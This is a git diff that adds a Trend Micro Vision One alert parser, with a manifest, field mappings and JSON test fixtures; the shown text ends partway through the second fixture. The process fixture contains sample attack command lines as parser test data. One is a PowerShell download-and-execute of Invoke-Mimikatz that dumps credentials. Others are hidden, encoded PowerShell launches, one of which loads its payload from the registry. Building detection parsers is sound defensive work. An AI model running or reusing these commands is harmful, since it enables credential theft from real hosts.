zO@Z3>Z^sFuxHMaE-Xw@)_;Gj+K zp2@L4J}PaJj5e(LMNriOJQ(aHhOaP(Sdlig2AF*|j#(F3riwTs#yi(bZx;KfKM#_= z0f!I10ynb`Vf7 z4)CUhtxRsj)yVEJ{JPuGUb}PA>o0TFsyND{K~INR8c;Z0%O_OO1=%wj&Qlls@A>^ zk%|V9FD=}lNSlseNTUidS?x{y7ws>&7#ecgC=UV-Y(_196p50dOY$*;i zgCyq96pP*$K@HLGv`4~T9-F9HJTX(UA(k-~_oCX%zj^gZN3(u{11A@C7_T8bkX^?OE=BP7_u>N$BKKpb7?|3VG5co+zl+w4xG#>$w{gk->z;rsRjq1> zV%`yW)P^IKDM=S6MKE064w#4Y>@W{uV$NQQMC>Q-=}#cQ4}|FRtxUTLx59`#&93ux zECyac80F1Vceq1N5=JG?=ax22%*3~lIYGNGPo@MU{dln1BRQNIzfDtUrfK^9os|79 zS>yTa38Q>K>wNppMf5{1;GKy2>vK3dz`y$P?vpwR4o3M73T>A;QF=maut~!&sdc#U zUw(_upXTN7GseQ3EKWA7Uz_Ib$d1F&oxu}6zpiK)BZs18lK_%#KEhJD9u}sOzbkXa z{TAL1cj7Q^^5dazk&+^AmU`fUzbUa%ccOIYuXH5wNo8B5%?Uf-%ah7Q|GQx0zivsm z1Kg?Ufvk3pMD9ZNz<%uzwiG2MivDJMaB9+pJ@Qkko1)DG-Y7@S5FvJD8x--&cky`tN4%EB}0Uq1)w>7NnXsHRj+U6wnk?9UhC z@X(WXL{5 zl?BmSBDm%rWOwiz=8YWb6Tp8h5*DWivGA4pNdc26Z|CMsejFnoNNm)-zR}~+k!5K6W%3;cq*PdRu@2eZ8JL; z{Iv82EwSo35735iDQJEA);ccao3j^rg#`O5jIglG10bisp}DR zPiTP}y|aJtv^>s4?W~>W(s=}v2iU@EX)&y+xybX1oC;{#u!+leg?I;LehMoePk(g+ z8{U$juF{n?>-JdRlbYRHJli081PY*nvc`#tOXFm-Q9G3VCqF&Owr-d z>7tbH;>N$m#?((gi={Isfhpz^mWy7;D;f6_i-I!g^m0l{yzKaupZbD&zI<{u4)jQ@ zk6RH33JN>nD+i)9u30odz5ze?3_5;Q_42>JQ+HsYvF@CJHMsGZ%Ai;v(1jUz4NcUp(>6#N=8SLigcg`j5TnVqWkqYgU9AG*y&!(=~P4xdE)BP#EV8!!| zKiD_nmwDz?K#7k_KDIWE#Cy#4sXQT6 z(ZDI>CmUkfPT6Aqc-1vOIV3>4F?_|Qx>80)u5B}S&px~_TGPAc-^ zUnV1?XLD?6TzeJ98s^h&pLe=NpHQK%E<6+- z3TmC7dy6A3hO)vAc$7@oK$oQ%V(`*8siMcPncg*M-WvFbfImWfIYvp*OM+vP6m47? z^i9koOnwLd%FHjsRugp%>w)kD;t;GhH5$_&duJPmLz(^IE9Ad!6akVqxR#}62y=_( z$be0+%AV7a#da2>|TlZ@}i9uzIhe2dUDK9zhBi3Go4|JXRQOl6Rw|&B+)ix`oCR%_FQBWs+VJ zez>%QPx$s>h2mwp9PP8js*LTOs?B#PJ$C1Ty<4RW19_FL3Ccxz-8;!N2j*o|FhN8r z(Y%LJ2OtjnSsk^c;DhL7ueR&APGPp3-X4v->8P=Fl@1i2(HI@&qm_2{awCfuuz~2^ z<|6Z^Lw-8}67C?J@+QJTP^y9sS5ozhp=*_Y%H*fcqbDIsUF;b;GISKNC31~O+-Jv$ z@6G?9Iz?It;r&Pkp55U0K9urBprGK-#^s6ZZa$WCZFSFv(hOt8i$~h1;K@04l>$a( zv&Tfcq24(Vd;n|xVEIYt1&cA9A_jfNp`mX=-onw+TPR?i62(fKI5X*yVpw6_>L`-- z$1eU7Y1K%i#Wva6!ZMZ#0^KhDGrQ4jfYDe!#qPcMshoFeT6=Le-N0@F?pIkfuY4U~ zX?w<1_Xf4smtWgs8$D2{v!uXq+12;`(4gC!OK0o5jnCb(_uI;XJURKa!tDEFnCVsa zeO#_of{fsbSd{M&K7oL!Z&fp`rLxG!-;~i0<46g9{;Z2OTvVyhk-7gRtZ_-n z)+K6Q{t{O81zk{xTrFl0Y30MUt2Wk#rOXD}w?imnG-PpGva`qIM+vu90T$=FT+EmY znS78dH%8TeHo&C7zaO$rDw*y@G#3t^M)BUnuZEH9Rwl4C@FNQC#0S3p-R&OASc3vY zwLV-nwm$pqrqW!y%7_VpbxcOm4!!k}Ns-V!6YN4#s$*V(17;DJap0jHs7cB@ry#pyaaS`W3dWCha~; z>oL(iuCf;glmIPioYcjpST#LmD#9b#n~`FCI_k#33s zN!-P^5pI|9HGUoL?&EfTFE&F6Bfa|11EZGfhdTiZ+Hbq!RtT4ycnv8gDvq6V;I-6k5mzXBJj>eg zuKhv;t@})6&lZNkALAS8LZlI&yKY=t)0@ldDu`24+RFQd>mg$*&})%+{Shm^Pbp%M zUX2WP9hXVked$)1`gvj6FjM;JH#wLB7M747bFAPwsYJhviUT*drR16>cBKn@>^`x6 zy<9hARqZ@bH`3WQ*no<|7#Gm;BrMI9bW1L z3;e3X8c>Fid+J(pb1y9qrzG`rQdv^o=XHidx}&Gc1;nR-M>;lvo>L-9;0b&^8~L#L zJ{OWWbMDi4{mcVxtc>@;P~(7X6W(HuHuFR2!cTw2h@9apip?u_-^2ZYf}?Mc1nr`9f#J(@5A3uTRYl%V=I|U zCx!keqP?a}usPrv%Fb+=BRF^vvw;F)_*6d-#Ls#V7)L}*&TRj6VA=st1eC-?u~nqp>Tc5BZpNGOSrwgXj0 zyd;Ht8%80~Sfd{AOKN@4q{Xe6^0B+PM~SKLLgJ{27!~nCsWMz>{m@D-Y`2~>`#=R+ zSm!waK>bV)^Jf#BjKq0f`lUzm+$YsIw?L7BV`w3G%n(?*AODKp-t-N{zws8|mn~|g zksNgNJCU+qAj~Y33rc#@-X~&FdNXy1PAg$%D1+FU%lAY37F!QjD^qks(Ah;VJ>#r; zRWLrxYTwHY&uSQdyQbMK-{5)wEeTMZKykOU%+YsIn)tIwFzW z#miDTR%75c?w1V_9`;pkl7Iq!KTUobe+8NQ)sE%v@Ro}jbmI_j0zne+@-tLt$~=`! z0<{n%(Iri=f;KlbxUenjUCa_ZFoye^DXQGIzsD>Bwd6R5i#HvyNo5_e`h>WdTbr zOvW$9v26QmKp24zNi*TafH02~218DJ zrB3%G|3$oy)|$FBzIlHdU>;Tc1M`(@q8&vr8z~q}M+G{;xfpOhJ|97*dPQQgP}vgT ze-FYrxoc-;BDoy{x+)`PXkI9Tn#B>fjK)yOAap2Uk+e**s$i@l^3C`^FRD#L!v{o`8k714T z<*~-l@{Q4xoK71XS41DR2Spx43#g@_8$Zcn!lLqnl6eFXcRd3`bvY>}!3hHKC? zyrQ(;KS;M$NG1-G0+R4Feg-1w>hi0o!bcqhMZ#X7ZvEB}3rHehv|-WFq4-dzeHCb< zM<8>bOP0UEK$|0(eG4N|!OpmcEURoCss*B)m8eI)tb+P(x^WSeBKx?yT>HT+!X`pd zZ>WL8!|q9bVHoD!`H4Yj&Hv?TW`0yS#F$} zW~4*R7ylsdOe$<`)|$|DpEq9!+gl9wbW(NgqTle*=Nr8j1ByC}l1lkp;DFHv%$KOX zTKu#ya`Sa~^zclwb5(av`YJ|vCc=qEtr3YH+Cs$ZJ6Gc&mzUGWav`VgQ&q-K{ti?J zV1Pwzn!Boh)GRLr_TPNm-RF4GhdosiPO5hg4QoQ;QlS}Xug25h?0=27eQeT z{Lp)YiR+U;I?J)T*tyMQEEvk6#OjKlcWm`-`LnMIIZ(_^1O$wL!NCMT=R=&i4CJg9 z8u|-Il_}1OI+P9NL+o2tP(^umC(mo3p#c_XlcW6Q|Lc-}E~p|X=e2wunThm_xG;Pp zBU3D@cBy}mbyBn3b76Rf_Oug0QAmUPSREI=In9TJ6zEaX7i77RhT5u#{`hc}iCw_% zC$&7XU3wO1p&W6vkj=Ykijqumz=_Jd8k6xHCWW-Re`V3?eFRb=Em+j--e8!6)L?fL zY3luaKQmU!4Nf|GTg1X+N}inE!ECh>3zrug_kU!|RdGjlaSaZh?lpo9}pCO-<)I@Ot@x+8`@#9xX;u z2hnHaUg6@vR-^b{AxU%oqU8aYB=^w)--Zv4RRS_rJ89QwxcHD1dNUWipa3XV_snqHQe z4o_-AHD&Qa`=B^K_lqR@tII$AHd6TCm`vw6iTWGzk7G#mj5ibzkop9djZ~c8D{17F ze1vM50L1o(G(DHe+Mib z+17*wrp1#y>g3we${`O@rHPR|mEfreBszs$1p#MM@!PJ!rbc`qb)C}LD!|-r2tUyR zLF`kYJP{C- zEn-hiWbh`_4;?|rg8(=$Q+iB`hr>e~zoa9ZdK6%#G6NV2_`Z-?K6ti;qq6> z`6BS4kVhUA0n)}3#D6xRbo8sfQWYkZmZqWFR!67eB-ag$-*9|4MBxzHWZ+H$F|?5K zU;45!R^c&KwVReE(aYZSuvC}agUFX7(GIZlN7Dtk-5^52Zp%q%T}6L_XQ5&wd01GK z(*;y=|6|`dh#A)W+h~W`s^x33;?EdSZoE#HEY4yUd8C<4LHuK5JR9-u)LQ<)E8RjHyp5IKzaGQIM8+`c5{i z5!c8?MR)vu1ULFHxFthnWlwq*j&dbAKPM(Af8FcjfR3q;<&g8-h73b!Nrv&7GRBA+Mx&_d5!3<;Lo|k`0ph@i$ZK3G+

&TK3Duv5*A4Ija_Ed-Y6DL%i=Rf6O9%7c&oV3QVzYec;S~R+&b=_ryMnpVz{L% zQkK5RWZP)=$c> zVPjH6Tj}&V$t#)BWi&ogBOc>iK?kk7>s`YkMz+Cy0e2rG9io1|>J^S!7 wM>ZBJ6Qe~@DrfdBvi literal 0 HcmV?d00001 diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..c0121a28d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,9 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +name: Trend Micro Vision One +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..e69de29bb diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..38a31dd29 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -0,0 +1,79 @@ +name: trend-micro-vision-one +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + organization.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + organization.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityId }}" + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.model.workbenchLink}}" + + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + # @todo should be along with registry.data.type to REG_SZ + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json new file mode 100644 index 000000000..5eca6b2ea --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -0,0 +1,66 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "type": [ + "info" + ] + }, + "@timestamp": "2022-09-06T02:49:30Z", + "file": { + "directory": "c:\\windows\\system32\\windowspowershell\\v1.0", + "hash": { + "sha1": "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + }, + "name": "powershell.exe", + "path": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe" + }, + "host": { + "ip": [ + "10.10.58.51" + ], + "name": "nimda" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "organization": { + "id": "shockwave\\sam", + "name": "shockwave\\sam" + }, + "process": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=", + "executable": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", + "parent": { + "command_line": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\microsoft\\windows update).update); powershell -nop -noni -w hidden -enc $x" + } + }, + "related": { + "hash": [ + "1B3B40FBC889FD4C645CC12C85D0805AC36BA254" + ], + "ip": [ + "10.10.58.51" + ] + }, + "rule": { + "name": "Credential Dumping via Mimikatz" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-9002-20220906-00023", + "investigation_status": "New", + "severity": "high", + "status": "Open" + } + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_registry.json b/Trend Micro/trend-micro-vision-one/tests/test_registry.json new file mode 100644 index 000000000..093876a30 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_registry.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00022\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Privilege Escalation via UAC Bypass\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"firstInvestigatedDateTime\": \"2022-10-06T02:30:31Z\", \"createdDateTime\": \"2022-09-06T02:49:31Z\", \"updatedDateTime\": \"2022-09-06T02:49:48Z\", \"incidentId\": \"IC-1-20230706-00001\", \"caseId\": \"CL-1-20230706-00001\", \"ownerIds\": [\"12345678-1234-1234-1234-123456789012\"], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 1, \"containerCount\": 1, \"cloudIdentityCount\": 1, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Alert\"]}, {\"entityType\": \"emailAddress\", \"entityValue\": \"support@pctutordetroit.com\", \"entityId\": \"SUPPORT@PCTUTORDETROIT.COM\", \"relatedEntities\": [], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"container\", \"entityValue\": \"k8s_democon_longrunl_default_09451f51-7124-4aa5-a5c4-ada24efe9da9_0\", \"entityId\": \"7d1e00176d78b2b1db0744a187314bf2ce39f3a7d43137c366ae6785e8a4f496\", \"relatedEntities\": [], \"relatedIndicatorIds\": 